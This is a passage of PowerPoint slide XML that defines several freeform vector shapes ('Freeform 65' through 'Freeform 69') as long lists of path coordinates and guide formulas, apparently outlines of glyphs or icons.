                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="258" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="142"/>
                      </a:ln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0" name="Freeform 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7196138" y="4975225"/>
                  <a:ext cx="249237" cy="217488"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 567 w 694"/>
                    <a:gd name="T1" fmla="*/ 367 h 604"/>
                    <a:gd name="T2" fmla="*/ 567 w 694"/>
                    <a:gd name="T3" fmla="*/ 367 h 604"/>
                    <a:gd name="T4" fmla="*/ 588 w 694"/>
                    <a:gd name="T5" fmla="*/ 409 h 604"/>
                    <a:gd name="T6" fmla="*/ 588 w 694"/>
                    <a:gd name="T7" fmla="*/ 424 h 604"/>
                    <a:gd name="T8" fmla="*/ 588 w 694"/>
                    <a:gd name="T9" fmla="*/ 446 h 604"/>
                    <a:gd name="T10" fmla="*/ 588 w 694"/>
                    <a:gd name="T11" fmla="*/ 446 h 604"/>
                    <a:gd name="T12" fmla="*/ 583 w 694"/>
                    <a:gd name="T13" fmla="*/ 488 h 604"/>
                    <a:gd name="T14" fmla="*/ 562 w 694"/>
                    <a:gd name="T15" fmla="*/ 530 h 604"/>
                    <a:gd name="T16" fmla="*/ 562 w 694"/>
                    <a:gd name="T17" fmla="*/ 530 h 604"/>
                    <a:gd name="T18" fmla="*/ 547 w 694"/>
                    <a:gd name="T19" fmla="*/ 556 h 604"/>
                    <a:gd name="T20" fmla="*/ 525 w 694"/>
                    <a:gd name="T21" fmla="*/ 577 h 604"/>
                    <a:gd name="T22" fmla="*/ 504 w 694"/>
                    <a:gd name="T23" fmla="*/ 593 h 604"/>
                    <a:gd name="T24" fmla="*/ 478 w 694"/>
                    <a:gd name="T25" fmla="*/ 603 h 604"/>
                    <a:gd name="T26" fmla="*/ 478 w 694"/>
                    <a:gd name="T27" fmla="*/ 603 h 604"/>
                    <a:gd name="T28" fmla="*/ 452 w 694"/>
                    <a:gd name="T29" fmla="*/ 603 h 604"/>
                    <a:gd name="T30" fmla="*/ 426 w 694"/>
                    <a:gd name="T31" fmla="*/ 603 h 604"/>
                    <a:gd name="T32" fmla="*/ 394 w 694"/>
                    <a:gd name="T33" fmla="*/ 593 h 604"/>
                    <a:gd name="T34" fmla="*/ 357 w 694"/>
                    <a:gd name="T35" fmla="*/ 571 h 604"/>
                    <a:gd name="T36" fmla="*/ 0 w 694"/>
                    <a:gd name="T37" fmla="*/ 367 h 604"/>
                    <a:gd name="T38" fmla="*/ 69 w 694"/>
                    <a:gd name="T39" fmla="*/ 241 h 604"/>
                    <a:gd name="T40" fmla="*/ 404 w 694"/>
                    <a:gd name="T41" fmla="*/ 435 h 604"/>
                    <a:gd name="T42" fmla="*/ 404 w 694"/>
                    <a:gd name="T43" fmla="*/ 435 h 604"/>
                    <a:gd name="T44" fmla="*/ 436 w 694"/>
                    <a:gd name="T45" fmla="*/ 451 h 604"/>
                    <a:gd name="T46" fmla="*/ 462 w 694"/>
                    <a:gd name="T47" fmla="*/ 451 h 604"/>
                    <a:gd name="T48" fmla="*/ 462 w 694"/>
                    <a:gd name="T49" fmla="*/ 451 h 604"/>
                    <a:gd name="T50" fmla="*/ 483 w 694"/>
                    <a:gd name="T51" fmla="*/ 441 h 604"/>
                    <a:gd name="T52" fmla="*/ 504 w 694"/>
                    <a:gd name="T53" fmla="*/ 420 h 604"/>
                    <a:gd name="T54" fmla="*/ 504 w 694"/>
                    <a:gd name="T55" fmla="*/ 420 h 604"/>
                    <a:gd name="T56" fmla="*/ 510 w 694"/>
                    <a:gd name="T57" fmla="*/ 404 h 604"/>
                    <a:gd name="T58" fmla="*/ 515 w 694"/>
                    <a:gd name="T59" fmla="*/ 388 h 604"/>
                    <a:gd name="T60" fmla="*/ 515 w 694"/>
                    <a:gd name="T61" fmla="*/ 372 h 604"/>
                    <a:gd name="T62" fmla="*/ 510 w 694"/>
                    <a:gd name="T63" fmla="*/ 362 h 604"/>
                    <a:gd name="T64" fmla="*/ 504 w 694"/>
                    <a:gd name="T65" fmla="*/ 346 h 604"/>
                    <a:gd name="T66" fmla="*/ 494 w 694"/>
                    <a:gd name="T67" fmla="*/ 330 h 604"/>
                    <a:gd name="T68" fmla="*/ 462 w 694"/>
                    <a:gd name="T69" fmla="*/ 309 h 604"/>
                    <a:gd name="T70" fmla="*/ 136 w 694"/>
                    <a:gd name="T71" fmla="*/ 120 h 604"/>
                    <a:gd name="T72" fmla="*/ 210 w 694"/>
                    <a:gd name="T73" fmla="*/ 0 h 604"/>
                    <a:gd name="T74" fmla="*/ 693 w 694"/>
                    <a:gd name="T75" fmla="*/ 277 h 604"/>
                    <a:gd name="T76" fmla="*/ 625 w 694"/>
                    <a:gd name="T77" fmla="*/ 398 h 604"/>
                    <a:gd name="T78" fmla="*/ 567 w 694"/>
                    <a:gd name="T79" fmla="*/ 362 h 604"/>
                    <a:gd name="T80" fmla="*/ 567 w 694"/>
                    <a:gd name="T81" fmla="*/ 367 h 6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694" h="604">
                      <a:moveTo>
                        <a:pt x="567" y="367"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="567" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="583" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="547" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="577"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="593"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="593"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="571"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="494" y="330"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="693" y="277"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="367"/>
                      </a:ln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1" name="Freeform 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7288213" y="4848225"/>
                  <a:ext cx="204787" cy="185738"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 62 w 567"/>
                    <a:gd name="T1" fmla="*/ 141 h 515"/>
                    <a:gd name="T2" fmla="*/ 130 w 567"/>
                    <a:gd name="T3" fmla="*/ 178 h 515"/>
                    <a:gd name="T4" fmla="*/ 130 w 567"/>
                    <a:gd name="T5" fmla="*/ 173 h 515"/>
                    <a:gd name="T6" fmla="*/ 130 w 567"/>
                    <a:gd name="T7" fmla="*/ 173 h 515"/>
                    <a:gd name="T8" fmla="*/ 110 w 567"/>
                    <a:gd name="T9" fmla="*/ 136 h 515"/>
                    <a:gd name="T10" fmla="*/ 94 w 567"/>
                    <a:gd name="T11" fmla="*/ 99 h 515"/>
                    <a:gd name="T12" fmla="*/ 94 w 567"/>
                    <a:gd name="T13" fmla="*/ 99 h 515"/>
                    <a:gd name="T14" fmla="*/ 94 w 567"/>
                    <a:gd name="T15" fmla="*/ 78 h 515"/>
                    <a:gd name="T16" fmla="*/ 94 w 567"/>
                    <a:gd name="T17" fmla="*/ 58 h 515"/>
                    <a:gd name="T18" fmla="*/ 99 w 567"/>
                    <a:gd name="T19" fmla="*/ 41 h 515"/>
                    <a:gd name="T20" fmla="*/ 104 w 567"/>
                    <a:gd name="T21" fmla="*/ 21 h 515"/>
                    <a:gd name="T22" fmla="*/ 104 w 567"/>
                    <a:gd name="T23" fmla="*/ 21 h 515"/>
                    <a:gd name="T24" fmla="*/ 115 w 567"/>
                    <a:gd name="T25" fmla="*/ 11 h 515"/>
                    <a:gd name="T26" fmla="*/ 115 w 567"/>
                    <a:gd name="T27" fmla="*/ 11 h 515"/>
                    <a:gd name="T28" fmla="*/ 120 w 567"/>
                    <a:gd name="T29" fmla="*/ 0 h 515"/>
                    <a:gd name="T30" fmla="*/ 241 w 567"/>
                    <a:gd name="T31" fmla="*/ 58 h 515"/>
                    <a:gd name="T32" fmla="*/ 241 w 567"/>
                    <a:gd name="T33" fmla="*/ 58 h 515"/>
                    <a:gd name="T34" fmla="*/ 230 w 567"/>
                    <a:gd name="T35" fmla="*/ 78 h 515"/>
                    <a:gd name="T36" fmla="*/ 230 w 567"/>
                    <a:gd name="T37" fmla="*/ 78 h 515"/>
                    <a:gd name="T38" fmla="*/ 220 w 567"/>
                    <a:gd name="T39" fmla="*/ 99 h 515"/>
                    <a:gd name="T40" fmla="*/ 220 w 567"/>
                    <a:gd name="T41" fmla="*/ 99 h 515"/>
                    <a:gd name="T42" fmla="*/ 209 w 567"/>
                    <a:gd name="T43" fmla="*/ 131 h 515"/>
                    <a:gd name="T44" fmla="*/ 209 w 567"/>
                    <a:gd name="T45" fmla="*/ 131 h 515"/>
                    <a:gd name="T46" fmla="*/ 209 w 567"/>
                    <a:gd name="T47" fmla="*/ 152 h 515"/>
                    <a:gd name="T48" fmla="*/ 209 w 567"/>
                    <a:gd name="T49" fmla="*/ 173 h 515"/>
                    <a:gd name="T50" fmla="*/ 209 w 567"/>
                    <a:gd name="T51" fmla="*/ 173 h 515"/>
                    <a:gd name="T52" fmla="*/ 214 w 567"/>
                    <a:gd name="T53" fmla="*/ 188 h 515"/>
                    <a:gd name="T54" fmla="*/ 225 w 567"/>
                    <a:gd name="T55" fmla="*/ 210 h 515"/>
                    <a:gd name="T56" fmla="*/ 225 w 567"/>
                    <a:gd name="T57" fmla="*/ 210 h 515"/>
                    <a:gd name="T58" fmla="*/ 241 w 567"/>
                    <a:gd name="T59" fmla="*/ 225 h 515"/>
                    <a:gd name="T60" fmla="*/ 262 w 567"/>
                    <a:gd name="T61" fmla="*/ 236 h 515"/>
                    <a:gd name="T62" fmla="*/ 566 w 567"/>
                    <a:gd name="T63" fmla="*/ 388 h 515"/>
                    <a:gd name="T64" fmla="*/ 498 w 567"/>
                    <a:gd name="T65" fmla="*/ 514 h 515"/>
                    <a:gd name="T66" fmla="*/ 0 w 567"/>
                    <a:gd name="T67" fmla="*/ 268 h 515"/>
                    <a:gd name="T68" fmla="*/ 62 w 567"/>
                    <a:gd name="T69" fmla="*/ 141 h 5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567" h="515">
                      <a:moveTo>
                        <a:pt x="62" y="141"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="130" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="130" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="130" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="104" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="104" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="115" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="120" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="230" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="230" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="220" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="209" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="214" y="188"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="225" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="225"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="566" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="498" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="141"/>
                      </a:ln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2" name="Freeform 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7278688" y="4759325"/>
                  <a:ext cx="268287" cy="158750"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 57 w 746"/>
                    <a:gd name="T1" fmla="*/ 0 h 442"/>
                    <a:gd name="T2" fmla="*/ 174 w 746"/>
                    <a:gd name="T3" fmla="*/ 52 h 442"/>
                    <a:gd name="T4" fmla="*/ 110 w 746"/>
                    <a:gd name="T5" fmla="*/ 184 h 442"/>
                    <a:gd name="T6" fmla="*/ 0 w 746"/>
                    <a:gd name="T7" fmla="*/ 131 h 442"/>
                    <a:gd name="T8" fmla="*/ 57 w 746"/>
                    <a:gd name="T9" fmla="*/ 0 h 442"/>
                    <a:gd name="T10" fmla="*/ 231 w 746"/>
                    <a:gd name="T11" fmla="*/ 79 h 442"/>
                    <a:gd name="T12" fmla="*/ 745 w 746"/>
                    <a:gd name="T13" fmla="*/ 310 h 442"/>
                    <a:gd name="T14" fmla="*/ 682 w 746"/>
                    <a:gd name="T15" fmla="*/ 441 h 442"/>
                    <a:gd name="T16" fmla="*/ 174 w 746"/>
                    <a:gd name="T17" fmla="*/ 210 h 442"/>
                    <a:gd name="T18" fmla="*/ 231 w 746"/>
                    <a:gd name="T19" fmla="*/ 79 h 4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746" h="442">
                      <a:moveTo>
                        <a:pt x="57" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="174" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="231" y="79"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="745" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="682" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="7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3" name="Freeform 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7327900" y="4668838"/>
                  <a:ext cx="269875" cy="141287"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 52 w 751"/>
                    <a:gd name="T1" fmla="*/ 21 h 394"/>
                    <a:gd name="T2" fmla="*/ 199 w 751"/>
                    <a:gd name="T3" fmla="*/ 79 h 394"/>
                    <a:gd name="T4" fmla="*/ 231 w 751"/>
                    <a:gd name="T5" fmla="*/ 0 h 394"/>
                    <a:gd name="T6" fmla="*/ 325 w 751"/>
                    <a:gd name="T7" fmla="*/ 37 h 394"/>
                    <a:gd name="T8" fmla="*/ 294 w 751"/>
                    <a:gd name="T9" fmla="*/ 116 h 394"/>
                    <a:gd name="T10" fmla="*/ 572 w 751"/>
                    <a:gd name="T11" fmla="*/ 231 h 394"/>
                    <a:gd name="T12" fmla="*/ 572 w 751"/>
                    <a:gd name="T13" fmla="*/ 231 h 394"/>
                    <a:gd name="T14" fmla="*/ 598 w 751"/>
                    <a:gd name="T15" fmla="*/ 236 h 394"/>
                    <a:gd name="T16" fmla="*/ 619 w 751"/>
                    <a:gd name="T17" fmla="*/ 236 h 394"/>
                    <a:gd name="T18" fmla="*/ 619 w 751"/>
                    <a:gd name="T19" fmla="*/ 236 h 394"/>
                    <a:gd name="T20" fmla="*/ 635 w 751"/>
                    <a:gd name="T21" fmla="*/ 226 h 394"/>
                    <a:gd name="T22" fmla="*/ 651 w 751"/>
                    <a:gd name="T23" fmla="*/ 205 h 394"/>
                    <a:gd name="T24" fmla="*/ 651 w 751"/>
                    <a:gd name="T25" fmla="*/ 205 h 394"/>
                    <a:gd name="T26" fmla="*/ 656 w 751"/>
                    <a:gd name="T27" fmla="*/ 189 h 394"/>
                    <a:gd name="T28" fmla="*/ 656 w 751"/>
                    <a:gd name="T29" fmla="*/ 189 h 394"/>
                    <a:gd name="T30" fmla="*/ 661 w 751"/>
                    <a:gd name="T31" fmla="*/ 173 h 394"/>
                    <a:gd name="T32" fmla="*/ 750 w 751"/>
                    <a:gd name="T33" fmla="*/ 210 h 394"/>
                    <a:gd name="T34" fmla="*/ 750 w 751"/>
                    <a:gd name="T35" fmla="*/ 210 h 394"/>
                    <a:gd name="T36" fmla="*/ 735 w 751"/>
                    <a:gd name="T37" fmla="*/ 257 h 394"/>
                    <a:gd name="T38" fmla="*/ 735 w 751"/>
                    <a:gd name="T39" fmla="*/ 257 h 394"/>
                    <a:gd name="T40" fmla="*/ 719 w 751"/>
                    <a:gd name="T41" fmla="*/ 299 h 394"/>
                    <a:gd name="T42" fmla="*/ 719 w 751"/>
                    <a:gd name="T43" fmla="*/ 299 h 394"/>
                    <a:gd name="T44" fmla="*/ 703 w 751"/>
                    <a:gd name="T45" fmla="*/ 336 h 394"/>
                    <a:gd name="T46" fmla="*/ 687 w 751"/>
                    <a:gd name="T47" fmla="*/ 362 h 394"/>
                    <a:gd name="T48" fmla="*/ 687 w 751"/>
                    <a:gd name="T49" fmla="*/ 362 h 394"/>
                    <a:gd name="T50" fmla="*/ 671 w 751"/>
                    <a:gd name="T51" fmla="*/ 378 h 394"/>
                    <a:gd name="T52" fmla="*/ 651 w 751"/>
                    <a:gd name="T53" fmla="*/ 389 h 394"/>
                    <a:gd name="T54" fmla="*/ 651 w 751"/>
                    <a:gd name="T55" fmla="*/ 389 h 394"/>
                    <a:gd name="T56" fmla="*/ 629 w 751"/>
                    <a:gd name="T57" fmla="*/ 393 h 394"/>
                    <a:gd name="T58" fmla="*/ 603 w 751"/>
                    <a:gd name="T59" fmla="*/ 389 h 394"/>
                    <a:gd name="T60" fmla="*/ 603 w 751"/>
                    <a:gd name="T61" fmla="*/ 389 h 394"/>
                    <a:gd name="T62" fmla="*/ 572 w 751"/>
                    <a:gd name="T63" fmla="*/ 383 h 394"/>
                    <a:gd name="T64" fmla="*/ 535 w 751"/>
                    <a:gd name="T65" fmla="*/ 367 h 394"/>
                    <a:gd name="T66" fmla="*/ 236 w 751"/>
                    <a:gd name="T67" fmla="*/ 247 h 394"/>
                    <a:gd name="T68" fmla="*/ 210 w 751"/>
                    <a:gd name="T69" fmla="*/ 315 h 394"/>
                    <a:gd name="T70" fmla="*/ 120 w 751"/>
                    <a:gd name="T71" fmla="*/ 278 h 394"/>
                    <a:gd name="T72" fmla="*/ 147 w 751"/>
                    <a:gd name="T73" fmla="*/ 210 h 394"/>
                    <a:gd name="T74" fmla="*/ 0 w 751"/>
                    <a:gd name="T75" fmla="*/ 152 h 394"/>
                    <a:gd name="T76" fmla="*/ 52 w 751"/>
                    <a:gd name="T77" fmla="*/ 21 h 3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751" h="394">
                      <a:moveTo>
                        <a:pt x="52" y="21"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="199" y="79"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="37"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="598" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="619" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="619" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="635" y="226"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="656" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="656" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="750" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="735" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="735" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="719" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="719" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="703" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="687" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="687" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="671" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="651" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="629" y="393"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="603" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="603" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="383"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="535" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="120" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="21"/>
                      </a:ln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4" name="Freeform 69"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7412038" y="4513263"/>
                  <a:ext cx="273050" cy="225425"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 630 w 757"/>
                    <a:gd name="T1" fmla="*/ 557 h 626"/>
                    <a:gd name="T2" fmla="*/ 630 w 757"/>
                    <a:gd name="T3" fmla="*/ 557 h 626"/>
                    <a:gd name="T4" fmla="*/ 635 w 757"/>
                    <a:gd name="T5" fmla="*/ 520 h 626"/>
                    <a:gd name="T6" fmla="*/ 635 w 757"/>
                    <a:gd name="T7" fmla="*/ 510 h 626"/>
                    <a:gd name="T8" fmla="*/ 625 w 757"/>
                    <a:gd name="T9" fmla="*/ 494 h 626"/>
                    <a:gd name="T10" fmla="*/ 625 w 757"/>
                    <a:gd name="T11" fmla="*/ 494 h 626"/>
                    <a:gd name="T12" fmla="*/ 609 w 757"/>
                    <a:gd name="T13" fmla="*/ 473 h 626"/>
                    <a:gd name="T14" fmla="*/ 582 w 757"/>
                    <a:gd name="T15" fmla="*/ 457 h 626"/>
                    <a:gd name="T16" fmla="*/ 0 w 757"/>
                    <a:gd name="T17" fmla="*/ 426 h 626"/>
                    <a:gd name="T18" fmla="*/ 47 w 757"/>
                    <a:gd name="T19" fmla="*/ 284 h 626"/>
                    <a:gd name="T20" fmla="*/ 441 w 757"/>
                    <a:gd name="T21" fmla="*/ 331 h 626"/>
                    <a:gd name="T22" fmla="*/ 441 w 757"/>
                    <a:gd name="T23" fmla="*/ 326 h 626"/>
                    <a:gd name="T24" fmla="*/ 99 w 757"/>
                    <a:gd name="T25" fmla="*/ 137 h 626"/>
                    <a:gd name="T26" fmla="*/ 147 w 757"/>
                    <a:gd name="T27" fmla="*/ 0 h 626"/>
                    <a:gd name="T28" fmla="*/ 598 w 757"/>
                    <a:gd name="T29" fmla="*/ 294 h 626"/>
                    <a:gd name="T30" fmla="*/ 598 w 757"/>
                    <a:gd name="T31" fmla="*/ 294 h 626"/>
                    <a:gd name="T32" fmla="*/ 651 w 757"/>
                    <a:gd name="T33" fmla="*/ 331 h 626"/>
                    <a:gd name="T34" fmla="*/ 693 w 757"/>
                    <a:gd name="T35" fmla="*/ 368 h 626"/>
                    <a:gd name="T36" fmla="*/ 693 w 757"/>
                    <a:gd name="T37" fmla="*/ 368 h 626"/>
                    <a:gd name="T38" fmla="*/ 724 w 757"/>
                    <a:gd name="T39" fmla="*/ 394 h 626"/>
                    <a:gd name="T40" fmla="*/ 740 w 757"/>
                    <a:gd name="T41" fmla="*/ 426 h 626"/>
                    <a:gd name="T42" fmla="*/ 740 w 757"/>
                    <a:gd name="T43" fmla="*/ 426 h 626"/>
                    <a:gd name="T44" fmla="*/ 750 w 757"/>
                    <a:gd name="T45" fmla="*/ 457 h 626"/>
                    <a:gd name="T46" fmla="*/ 756 w 757"/>
                    <a:gd name="T47" fmla="*/ 489 h 626"/>
                    <a:gd name="T48" fmla="*/ 756 w 757"/>
                    <a:gd name="T49" fmla="*/ 489 h 626"/>
                    <a:gd name="T50" fmla="*/ 745 w 757"/>
                    <a:gd name="T51" fmla="*/ 526 h 626"/>
